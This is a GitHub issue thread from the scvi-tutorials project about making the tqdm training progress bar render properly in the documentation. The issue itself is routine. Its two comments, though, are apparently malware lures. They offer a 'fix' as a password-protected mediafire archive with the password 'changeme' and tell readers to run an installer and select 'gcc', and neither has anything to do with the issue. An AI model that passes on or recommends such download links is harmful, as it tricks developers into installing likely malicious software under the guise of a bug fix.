### ISSUE TITLE
Fix the progress bar during training models trough tout the tutorials

### ISSUE THREAD

**Issue by ori-kron-wis** [scverse/scvi-tutorials#313]
**Is your feature request related to a problem? Please describe.**

We would like to be able to show the tqdm progress bar in our RTD , but not as it shown now where every epoch is shown interactively. We do want to keep the bottom line of training bar.

**Describe the solution you'd like**

We would want to re check the custom progress bar code . the reason that code exists is because the docs used to not render the tqdm notebook mode and it used to be that when you saved a jupyter notebook and reopened the fancier progress bar disappears
Not sure if it’s still a problem

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
